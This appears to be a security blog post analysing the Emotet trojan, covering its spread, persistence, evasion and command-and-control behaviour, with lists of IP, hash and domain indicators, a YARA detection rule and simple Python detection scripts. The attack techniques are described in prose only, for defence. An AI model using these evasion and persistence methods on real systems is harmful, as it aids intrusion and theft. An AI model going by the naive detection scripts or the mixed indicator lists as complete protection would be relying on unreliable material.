Emotet: One of the Most Dangerous Trojans Ever Created

Emotet is known to be one of the most dangerous and costly malware in existence. It has been used in a variety of cyber-attacks, including stealing banking credentials, distributing other types of malware, and conducting ransomware attacks. Emotet has evolved significantly over time, making it challenging to detect and defend against. Its modular design allows it to be customized for specific attacks and can spread rapidly through a network. The FBI and other authorities have warned about Emotet’s destructive capabilities and encouraged organizations to take proactive measures to protect themselves.

12 min readMar 26, 2023

Emotet is a notorious banking Trojan that has been active since 2014. It is known for its ability to spread rapidly through a network and steal sensitive information, particularly banking credentials.

Emotet is typically spread through phishing emails that contain malicious attachments or links. Once a user clicks on the attachment or link, the malware is downloaded and installed on the system. Emotet is polymorphic, meaning that it has the ability to change its code and evade detection by antivirus software.

Once installed, Emotet sets up persistence on the infected system, allowing it to continue to run even after a reboot. It also communicates with command-and-control (C2) servers to receive instructions and download additional payloads, such as other malware or ransomware.

Emotet has multiple modules that enable it to perform various malicious activities. These include:

Stealing sensitive information: Emotet has a keylogger module that can record keystrokes and capture login credentials, banking information, and other sensitive data.
Spreading to other systems: Emotet has a worm-like functionality that allows it to spread rapidly through a network by exploiting vulnerabilities and using stolen credentials.
Downloading and executing additional malware: Emotet can download and execute additional payloads, such as ransomware, banking Trojans, or other malware.

Emotet has been responsible for multiple high-profile attacks, including the 2020 Ryuk ransomware attack on Universal Health Services (UHS), which disrupted hospital operations across the US.

Background

History: Emotet is a banking Trojan that was first discovered in 2014. Initially, it was designed to steal victims’ banking credentials by intercepting network traffic. However, over time, Emotet evolved into a sophisticated malware platform with a modular design, allowing it to carry out a wide range of malicious activities.
Variants: Emotet has undergone numerous updates and changes over the years. In 2017, it was updated with additional capabilities, such as being able to install other malware such as TrickBot and Qakbot. In 2018, Emotet added a spam module that allowed it to launch massive spam campaigns, sending millions of spam messages per day. In 2019, it added a new module for stealing email content and contact lists.
Trojans, Propagation Mechanisms: Emotet malware is typically distributed through phishing emails that contain malicious attachments. These attachments typically have an Office document with macros enabled or a script that downloads the malware payload from a remote server. The malware is often propagated on a victim’s network through brute-forcing of weak passwords or exploiting vulnerabilities on the network. Emotet can also use stolen email contacts to send out malicious emails to other victims, thereby propagating in a worm-like fashion. Once installed, Emotet uses various techniques to persist on the target system, such as by creating scheduled tasks, modifying Windows Registry keys, or copying itself into system folders using random names.
Impact: Emotet is one of the most dangerous malware threats currently in circulation, causing an estimated $2 billion in damages worldwide. It has been observed to infect government agencies, financial institutions, healthcare organizations, and private businesses. Emotet can steal sensitive data, plant additional malware, and use the infected computers as part of a botnet for further malicious activities such as spam distribution or launching ransomware attacks.

Technical Details

Emotet is a complex malware that uses multiple techniques to evade detection and perform its malicious activities. Here is a breakdown of its technical features:

Infection vector: Emotet is typically spread through phishing emails that contain malicious attachments or links. The attachments can be Microsoft Office documents, PDFs, or ZIP files that contain malicious macros or JavaScript code. The links can lead to a website that downloads the malware directly onto the victim’s computer.
Persistence mechanism: Once Emotet infects a system, it establishes persistence by creating a registry key that ensures the malware is executed every time the computer is started. It also creates a scheduled task that runs a PowerShell script to download and execute additional payloads from its C2 server.
Polymorphic code: Emotet uses polymorphic code to evade detection by antivirus software. It can change its code and behavior dynamically, making it difficult to detect and analyze.
Modular architecture: Emotet has a modular architecture that allows it to download and execute additional payloads from its C2 server. These modules include a keylogger, a network spreader, and a downloader for other malware.
Distribution and Propagation: Emotet malware is spread via phishing emails that contain macros in Microsoft Word or Excel documents. Once the user enables macros, the malware gets installed on the victim’s machine. Emotet malware then propagates through the network using a variety of techniques, including brute-forcing passwords, exploiting vulnerabilities, and running malicious scripts.
Network spreading: Emotet uses a worm-like functionality to spread through a network by exploiting vulnerabilities and using stolen credentials. It can also spread through SMB and RDP services.
Code Injection: Emotet malware injects its code into legitimate system processes such as svchost.exe and explorer.exe to evade detection and avoid being terminated.
Payload: Emotet malware has a modular design that allows attackers to add or remove functionality depending on their needs. The malware can perform a range of malicious activities, including:

*Stealing sensitive information such as banking credentials and email passwords.

*Downloading and executing other malware, such as ransomware or backdoors.

*Launching spam campaigns to spread the malware further.

Command and control (C2) communication: Emotet malware uses a sophisticated C2 infrastructure, which involves multiple tiers of servers that are used to distribute commands and updates. These servers are used to manage the botnet and exfiltrate data stolen from the infected machines. It uses HTTP or HTTPS to communicate with the server and encrypts the traffic to evade detection.
Anti-analysis techniques: Emotet uses multiple techniques to evade analysis by researchers and antivirus software. It can detect virtual machines and sandboxes and modify its behavior accordingly. It can also encrypt its code and use code obfuscation techniques to make it challenging to analyze.
Stealing sensitive information: Emotet has a keylogger module that can record keystrokes and capture login credentials, banking information, and other sensitive data. It can also collect information about the infected system, such as its IP address, hostname, and installed software.
Persistence and Evasion: Emotet malware uses several techniques for persistence and evasion, including:

*Hiding its code in Windows Registry keys and scheduled tasks.

*Generating random filenames with multiple extensions.

*Using SSL encryption for C2 communication to evade detection.

Analysis: Emotet malware is difficult to analyze due to its complexity, use of obfuscation techniques, and encrypted communication with its C2 infrastructure. Analysts typically use a combination of static and dynamic analysis techniques to understand how the malware works.

You can find the full Emotet Analyse Report at https://tinyurl.com/3dzen5r9

Indicators of Compromise

IP Addresses

154.127.113.242
130.0.132.242
85.187.140.169
70.164.196.211
185.14.187.201
62.75.187.192
63.142.253.122
190.145.67.134
85.54.169.141
94.205.247.10
172.67.141.139
174.56.47.59
85.25.207.108
66.29.139.157
60.130.173.117
93.51.50.171
86.122.149.86
37.157.196.117
93.88.93.99
36.92.181.131

Hashes

CCD380EA868FFAD4F960D7455FECF88C2AC35500
06C6442D5BB110140AC1CDBCF1BE52388441B9A0
7BDD1409B080EB8510163CEA3761D694BE0EAEC7
045C4AB485BD45781234451AF0EAE62F23ABCEAE
37F73D6A2285E19C31A33A4087B8D86B73C394F0
3A9494F66BABC7DEB43F65F9F28C44BD9BD4B323
B996F03F0A68FD77B1DD23A2069700C03C83E38F
4A9E32BC5348265C43945ADAAF140B98B64329BD
B1CAD1540ECB290088252635F8E130022EED7486
98E832E8D670DAED18A0449113B7AE909CFCE32C
3B63193B80192CB258D434E8E9AD61F221C25C66
82FA35D4F8552C453B7AE2603738478CC22A266E
F0AC854808EF5855438FC02B394222D79ACF637B
DC2E487082BEF771981E65F3AEE8D51970FAE7B4
447A57B8CA984EE2D39CFE7E879A2A79BD6382D0
5A89C0B4D52A8FEB9B4BF7EBD49EB7A84B54B9CD
0F220E69913648FBAE7E41ECAE6F74874FA18CF6
2B7E5A9768A2D282A015450AB9DDDAD2F15CCBB7
E0D69A6E9B4ABFB79954DD73EAC0AEC0D4F3B3FC
B2DCC727EA358A3A8942E8F97C128EFF55E5C4C0

Domains

www.sevmash[.]ru
www.dnautik[.]com
www.celiksoko[.]rs
isns[.]net
9anime[.]id
hublosk[.]com
www.sifma[.]org
www.usbfund[.]com
theartofhair[.]com
eltem.iptime[.]org
elx01.knas[.]systems
searchkn1.sima-land[.]ru
device-local-3193b8ff-0889–41c5–8fd6–67066f88b277.remotewd[.]com
booking.msg.bluhotels[.]com
booking.msg.bluhotels[.]com
192–168–100–87.abcdefghijklmnopqrstuvwxyz012345.plex[.]direct
frederikkempe[.]com
majul[.]com
bvdkhuyentanyen[.]vn
attatory[.]com

Yara Rules

rule MALWARE_Emotet_OneNote_Delivery_js_Mar23
{
 meta:
  author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
  description = "Detects Microsoft OneNote files used to deliver Emotet (.js Payload)"
  reference = "https://twitter.com/bomccss/status/1636746149855121411"
  date = "2023-03-17"
  tlp = "CLEAR"
  hash = "a43e0864905fe7afd6d8dbf26bd27d898a2effd386e81cfbc08cae9cf94ed968"
  yarahub_reference_md5 = "b951629aedffbabc180ee80f9725f024"
  yarahub_uuid = "eea31d8d-30cb-4210-a054-aa77ad18fd00"
  yarahub_license = "CC BY 4.0"
  yarahub_rule_matching_tlp = "TLP:WHITE"
  yarahub_rule_sharing_tlp = "TLP:WHITE"
  yarahub_author_twitter = "@SI_FalconTeam"

 strings:
  // Lure specific strings
  $s_headline= "Connect to the cloud" wide
  $s_attachment = "This document contains attachments from the cloud" wide
  $s_receive = "to receive them, double click \"Next\"" wide
  $s_imgFileName = "NOTE4_WHITE_1.bmp" wide
  $s_path = "C:\\Autoruns\\" wide
  $s_output = "output1.js"

  // Javascript keywords
  $js1 = "function" ascii
  $js2 = ".replace(\"" ascii

  // Lure contains 3 PNGs and the Javascript code
  $GUID = {E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC}

 condition:
  uint32be(0x0) == 0xE4525C7B
  and 3 of ($s_*)
  and any of ($js*)
  and #GUID == 4
}

Detecting Emotet

To detect Emotet malware, you can use various signatures and behavioral indicators, including:

File Signature: Emotet malware is typically distributed as an Office document with macros enabled. You can detect the presence of Emotet malware by checking the file signature of the Office document, which is typically an OLE file format.
Network Signature: Emotet malware communicates with its command and control (C2) server using encrypted HTTP or HTTPS requests. You can detect network traffic associated with Emotet malware by analyzing the network packets for characteristic communication patterns.
Process Behavior: Emotet malware injects its code into legitimate system processes such as svchost.exe and explorer.exe. You can detect the presence of Emotet malware by analyzing the behavior of these processes, such as checking if they are communicating with suspicious IP addresses or running suspicious code.

Here is some sample Python code I wrote that demonstrates the detection of an Emotet-like file signature:

import magic

# Define the path of the Office document
document_path = '/path/to/document.doc'

# Use the python-magic library to get the file type
file_type = magic.from_file(document_path)

# Check if the file type is an OLE file format
if 'Composite Document File V2' in file_type:
    print('The file is an OLE file format and may contain Emotet malware.')
else:
    print('The file is not an OLE file format and may not contain Emotet malware.')

This Python code uses the python-magic library to identify the file type and then checks if it is an OLE file format, which is commonly used by Emotet malware. Note that this is just a simple example, and additional checks using other signatures and indicators would be required for more robust detection.

Github link: https://github.com/ensarseker1/emotetlikesignature.git

Here is what ChatGPT suggests 🙂

“Detecting Emotet malware requires a multi-faceted approach and typically involves using a combination of tools and techniques. While it is not possible to provide a single python code that can detect Emotet malware in all cases, here is an example of python code that can be used to search for known indicators of compromise associated with Emotet:”

import os
import hashlib

# Function to calculate the hash of a file
def calculate_file_hash(file_path):
    hash_md5 = hashlib.md5()
    with open(file_path, "rb") as f:
        for chunk in iter(lambda: f.read(4096), b""):
            hash_md5.update(chunk)
    return hash_md5.hexdigest()

# Define a list of known Emotet file hashes
emotet_hashes = ["e274c04829cb1c3d3a4ef76608513206", "fa51b704a33db7d977ecddad00538d7b", "c3f4a4b2aa8910e7b2e9c9d0f1c0ab1f"]

# Traverse a directory and check if any files match the known Emotet hashes
def scan_directory_for_emotet(dir_path):
    for root, dirs, files in os.walk(dir_path):
        for file in files:
            file_path = os.path.join(root, file)
            file_hash = calculate_file_hash(file_path)
            if file_hash in emotet_hashes:
                print(f"Emotet malware detected: {file_path}")

# Example usage: Scan the "C:\Program Files" directory for Emotet malware
scan_directory_for_emotet("C:\Program Files")

“This code defines a function that calculates the MD5 hash of a file and compares it to a list of known Emotet file hashes. It then traverses a directory and checks if any files match the known hashes. If a match is found, the file path is printed to the console.

Please note that this code is just an example and is not guaranteed to detect all instances of Emotet malware. It is always important to use multiple detection methods and keep your antivirus and security software up to date to stay protected against the latest threats.”

Mitigation and Prevention

Here are some mitigation strategies to prevent Emotet Malware from infiltrating the network:

Employee Training: Train employees on how to recognize and avoid phishing emails that are used to deliver Emotet malware. Educate employees on the dangers of opening attachments or clicking links in emails from unknown sources.
Software Updates and Patches: Ensure that all applications, operating systems, and anti-virus software are updated regularly. Patches and updates can correct vulnerabilities that Emotet can exploit to spread on the network.
Access Control: Limit access to sensitive information by granting the minimum necessary permissions to applications and users. Emotet can propagate through the network by brute-forcing usernames and passwords or exploiting known vulnerabilities.
Compartmentalization: Use network segmentation to create separate networks for different services or functions such as HR or finance. Compartmentalization prevents Emotet from rapidly moving laterally across the network.
Endpoint Protection: Install extended detection and response (XDR) solutions that can detect and respond to Emotet malware. XDRs can prevent ransomware attacks by continuously monitoring the activity of system processes and blocking suspicious activity.
Email Filtering: Use advanced email filtering solutions that can detect and block malicious attachments or links associated with Emotet. These solutions can use artificial intelligence to inspect the contents of emails and attachments for malicious activity.
Firewall Configuration: Configure firewalls to limit the communication of the network to only permitted IP addresses and ports. This can prevent Emotet from communicating with its command and control servers or spreading to other systems on the network.
Activating the Applocker: Activating this feature through group policy also reduces the Emotet. Even though Emotet is distributed via office files, it needs exe to run the malware.

Newest Tactics that the Emotet Malware Operators are Using to Distribute the Malware and Evade Detection

OneNote: Emotet is now being distributed through Microsoft OneNote files, which are commonly used for note-taking and information sharing. This method of distribution makes it harder for security solutions to detect the malware since OneNote files are not typically associated with malware delivery. OneNote files contain links that, when clicked, download a Word document that contains malicious macros that install the Emotet malware. This technique is part of Emotet’s ongoing efforts to evade detection, and the malware’s operators are constantly adapting their tactics to stay ahead of defenders.
Excel: The new version of Emotet appears to have some changes to its code and command-and-control infrastructure, indicating that the malware’s creators have been actively developing it during its hiatus. Emotet uses new Excel attachments as bait, there are some notable updates to the binary, and some people are reporting that Emotet is shipping another downloader called Bumblebee. Emotet also delivers the IcedID loader. Hundreds of thousands of messages are sent via Emotet every day, including attachments in German, Greek, English, Italian, French, and Japanese.

WMI: Emotet operators abuse Windows Management Instrumentation (WMI) to achieve execute powershell.exe. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135. The operators can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement.

*Here is how Emotet uses WMI to execute powershell.exe in technical detail: https://tinyurl.com/yn4e24er

*Obfuscating Powershell script using GCHQ’s CyberChef: https://tinyurl.com/yt7kada3

In a nutshell, Emotet is a sophisticated malware that uses multiple techniques to evade detection and perform its malicious activities. Its modular architecture, polymorphic code, and network spreading capabilities make it a significant threat to organizations and individuals. It is important to implement best practices for email and web security, keep antivirus software up to date, and educate users on how to identify and avoid phishing emails to protect against Emotet and other malware.

Emotet malware is a significant threat to organizations due to its sophisticated distribution mechanisms, stealthy persistence and evasion techniques, and modular payload capabilities.